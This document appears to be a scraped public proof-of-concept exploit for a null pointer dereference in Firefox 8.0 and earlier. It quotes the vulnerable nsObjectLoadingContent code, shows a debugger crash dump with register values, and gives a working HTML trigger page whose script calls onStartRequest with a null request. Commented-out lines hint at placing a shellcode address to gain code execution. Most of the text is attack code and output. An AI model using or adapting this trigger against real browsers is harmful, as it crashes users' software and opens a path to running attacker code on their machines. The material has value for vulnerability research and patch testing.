59 lines
No EOL
1.9 KiB
HTML
59 lines
No EOL
1.9 KiB
HTML
# Firefox <= 8.0 null pointer dereference PoC exploit
|
|
# Author: 0in (Maksymilian Motyl)
|
|
# Tested on Firefox 8.0/4.0 on windows and Firefox 7.1 on Linux
|
|
# Lets see in code:
|
|
# $ cat ./mozilla-release/content/base/src/nsObjectLoadingContent.cpp
|
|
|
|
NS_IMETHODIMP nsObjectLoadingContent::OnStartRequest(nsIRequest *aRequest,
|
|
nsISupports *aContext)
|
|
{
|
|
if (aRequest != mChannel) { // our pointer is checked there, mChannel is null. I think maybe some magick in js can help there
|
|
return NS_BINDING_ABORTED;
|
|
}
|
|
AutoNotifier notifier(this, PR_TRUE);
|
|
|
|
if (!IsSuccessfulRequest(aRequest)) { // go
|
|
|
|
|
|
//----------------------------------------------------------------------------------
|
|
PRBool nsObjectLoadingContent::IsSuccessfulRequest(nsIRequest* aRequest)
|
|
{
|
|
nsresult status;
|
|
nsresult rv = aRequest->GetStatus(&status); // Code execution is here.
|
|
|
|
// ---------------------------------------------------------------------------------
|
|
|
|
|
|
DUMP:
|
|
014E7A28 8B7D 08 MOV EDI,DWORD PTR SS:[EBP+8]
|
|
014E7A2B 8B07 MOV EAX,DWORD PTR DS:[EDI] ; access violation when reading 0x00000000
|
|
014E7A2D 8D4D FC LEA ECX,DWORD PTR SS:[EBP-4]
|
|
014E7A30 51 PUSH ECX
|
|
014E7A31 57 PUSH EDI
|
|
014E7A32 FF50 14 CALL DWORD PTR DS:[EAX+14]
|
|
|
|
EAX 0012BFC0
|
|
ECX 00080000
|
|
EDX 00080000
|
|
EBX 03A199E8
|
|
ESP 0012BF44
|
|
EBP 0012BF54
|
|
ESI 03A199C0
|
|
EDI 00000000
|
|
EIP 014E7A2B xul.014E7A2B
|
|
|
|
$ cat 2011_powrot_komuny.html
|
|
<html>
|
|
<body>
|
|
|
|
<object id="dupa">
|
|
<script>
|
|
RIINDC=document.getElementById("dupa");
|
|
RIINDC.QueryInterface(Components.interfaces.nsIRequestObserver);
|
|
//RIINDC.mchannel=SHELLCODE_ADDR
|
|
RIINDC.onStartRequest(null,RIINDC.QueryInterface(Components.interfaces.nsISupports));
|
|
//RIINDC.onStartRequest(RIINDC.mchannel,DWCJWL.QueryInterface(Components.interfaces.nsISupports));
|
|
|
|
</script>
|
|
</body>
|
|
</html> |